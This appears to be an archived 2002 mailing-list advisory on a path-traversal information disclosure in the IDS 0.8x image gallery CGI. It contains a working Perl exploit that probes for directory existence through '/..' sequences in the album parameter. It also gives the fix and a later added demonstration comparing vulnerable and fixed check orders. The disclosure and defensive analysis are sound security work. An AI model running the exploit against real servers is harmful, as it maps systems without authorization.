Information Disclosure Vulnerability in IDS 0.8x

From: isoxat_private
Date: Tue May 28 2002 - 13:21:20 PDT

    Hello,
    
    There is an information disclosure vulnerability in IDS 0.8x (assume other versions vulnerable).
    IDS is a CGI-based image thumbnail gallery.  When an attacker sends a traversed directory 
    (i.e. /../../../../home/foobar) in the variable album, it is possible to tell if the specified 
    directory exists by examining the returned error page.  This is possible due to the following 
    snippet of code: 
    
    
    idsShared.pm::getAlbumToDisplay()
    =================================
        if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") { # does this album exist?
            bail ("Sorry, the album \"$albumtodisplay\" doesn't exist: $!");
        }
        
        if ($albumtodisplay =~ /\.\./) { # hax0r protection...
            bail ("Sorry, invalid directory name: $!");
        }
    
    
    
    Attached below is a working exploit for this vulnerability.  The fix is simple: just flip the if 
    statements around so it checks for ..'s first.  Also note there is the same type of information 
    disclosure vulnerability in index.cgi via the following code (I have just not verified if it is 
    exploitable, although it obviously seems as though it is):
    
    
    index.cgi::processData()
    ========================
        if ($mode eq 'image') {
            getAlbumToDisplay();
            $imagetodisplay = $query->param('image') || bail ("Sorry, no image name was provided: $!");

            unless (-e "albums$albumtodisplay/$imagetodisplay") { # does this album exist?
                bail ("Sorry, the image \"albums$albumtodisplay/$imagetodisplay\" doesn't exist: $!");
            }
        }
        
        if (($imagetodisplay =~ /\.\./) || ($albumtodisplay =~ /\.\./)) {
            bail ("Directory/image paths must not include \"../\".");
        }
    
    
    
    
    Have a good one,
    isox
    
    
    <--- Begin Exploit Code --->
    
    #!/usr/bin/perl -w
    #
    # ids-inform.pl (05/27/2002)
    #
    # Image Display System 0.8x Information Disclosure Exploit.
    # Checks for existence of specified directory.
    #
    # By: isox [isoxat_private]
    #
    #
    # usage: self explanatory
    #
    # my spelling: bad
    #
    # Hi Cody, You should be proud, I coded for you!
    # Hi YpCat, Your perl is k-rad and pheersom.
    #
    #######
    # URL #
    #######
    # http://0xc0ffee.com
    # http://hhp-programming.net
    #
    #
    #################
    # Advertisement #
    #################
    #
    # Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
    # This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
    # more information.
    #
    
    use strict;
    use IO::Socket::INET;
    
    # Number of "/.." components to prepend: enough to climb to the
    # filesystem root from wherever the albums/ directory lives.
    my $maxdepth = 30;
    
    Banner();
    
    if ($#ARGV < 3) {
      die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
    }
    
    my ($dir, $path, $host, $port) = @ARGV;
    
    my $dotdot = '';
    for (my $t = 0; $t < $maxdepth; $t++) {
      $dotdot .= "/..";
    }
    
    # The traversed path goes in the "album" parameter.  IDS tests whether the
    # album exists before it tests for "..", so the server only answers
    # "invalid directory name" when the probed directory really exists.
    my $query = "GET $path?mode=album&album=$dotdot/$dir HTTP/1.0\r\n"
              . "Host: $host\r\n\r\n";
    my $response = Directory($query, $host, $port);
    
    if ($response =~ /Sorry, invalid directory name/) {
      print("$dir Exists.\n");
    } else {
      print("$dir Does Not Exist.\n");
    }
    
    exit 0;
    
    
    sub Banner {
      print("IDS Information Disclosure Exploit\n");
      print("Written by isox [isox\@chainsawbeer.com]\n\n");
    }
    
    
    # Send one raw HTTP request and return the complete response body.
    sub Directory {
      my ($query, $host, $port) = @_;
    
      my $sock = IO::Socket::INET->new(
                PeerAddr => $host,
                PeerPort => $port,
                Timeout  => 8,
                Proto    => 'tcp'
              ) or die("sock: $@\n");
    
      print $sock $query;
      my $buf = do { local $/; <$sock> };   # read until the server closes the connection
      close($sock);
    
      return defined $buf ? $buf : '';
    }
    
    <-- EOF -->
    
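The check-ordering bug described in the post (and the identical one in index.cgi::processData()), as an added example that is not part of the original message or of IDS's own code: a stand-alone Perl script that builds a throwaway album tree under a temporary directory (constructed data), reimplements the vulnerable check order and a fixed order as functions that return the bail() message instead of exiting, and runs the same probe the exploit uses against each. The function names vulnerable_check, fixed_check and probe, the temporary-directory layout, and the use of Cwd::realpath to confine the resolved path to the albums root are assumptions of this example, not IDS code.

```perl
#!/usr/bin/perl
# Added example, not IDS code: why the order of the two checks in
# getAlbumToDisplay() turns the "album" parameter into a directory-existence
# oracle, and how reordering (plus a realpath containment test) closes it.
use strict;
use warnings;
use Cwd        qw(realpath);
use File::Path qw(make_path);
use File::Temp qw(tempdir);

# Constructed layout: <tmp>/albums/vacation is a real album, and
# <tmp>/private/secret stands in for a directory an attacker wants to probe.
my $ppath = tempdir(CLEANUP => 1) . '/';
make_path("${ppath}albums/vacation", "${ppath}private/secret");

# IDS 0.8x order: filesystem test first, ".." test second.  Returns the
# bail() message instead of exiting so the two orders can be compared.
sub vulnerable_check {
    my ($album) = @_;
    if ($album ne '/' && !-e ($ppath . "albums/$album")) {
        return "Sorry, the album \"$album\" doesn't exist";
    }
    if ($album =~ /\.\./) {
        return "Sorry, invalid directory name";
    }
    return "ok";
}

# Fixed order: reject ".." before touching the filesystem.  The realpath()
# test additionally refuses anything that resolves outside albums/, which
# the regex alone does not catch (a symlink planted inside albums/, say).
sub fixed_check {
    my ($album) = @_;
    return "Sorry, invalid directory name" if $album =~ /\.\./;
    my $root   = realpath("${ppath}albums");
    my $target = realpath("${ppath}albums/$album");   # undef if it cannot be resolved
    # Everything that is not a directory under albums/ gets the same answer,
    # so nothing outside the root is distinguishable from anything else.
    if (!defined $target || $target !~ m{^\Q$root\E(?:/|$)} || !-d $target) {
        return "Sorry, the album \"$album\" doesn't exist";
    }
    return "ok";
}

# The exploit's probe: prepend enough "/.." to climb to the filesystem root,
# then append the absolute directory to test.  With the vulnerable order,
# "invalid directory name" is reachable only after the -e test succeeded.
sub probe {
    my ($check, $dir) = @_;
    my $album = ('/..' x 16) . $dir;
    return $check->($album);
}

my $real = "${ppath}private/secret";    # exists
my $fake = "${ppath}private/nothing";   # does not exist

for my $pair (['vulnerable', \&vulnerable_check], ['fixed', \&fixed_check]) {
    my ($name, $check) = @$pair;
    my $r = probe($check, $real);
    my $f = probe($check, $fake);
    print "$name: existing dir -> \"$r\"\n";
    print "$name: missing dir  -> \"$f\"\n";
    print "$name: ", ($r eq $f ? "same response, nothing leaked\n"
                               : "responses differ, existence leaked\n");
}

# Legitimate use keeps working under the fix, while a symlink inside
# albums/ that points outside it is refused even though it contains no "..".
symlink("${ppath}private", "${ppath}albums/escape") or die "symlink: $!";
print "fixed: vacation      -> ", fixed_check('vacation'), "\n";
print "fixed: escape/secret -> ", fixed_check('escape/secret'), "\n";
```

Run it with no arguments; it needs only a writable temporary directory. The point to take from it is that swapping the two if statements, as the post recommends, is sufficient to close the oracle, and that the realpath() containment test is a separate hardening against escapes that never spell out "..".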



    This archive was generated by hypermail 2b30 : Tue May 28 2002 - 14:21:27 PDT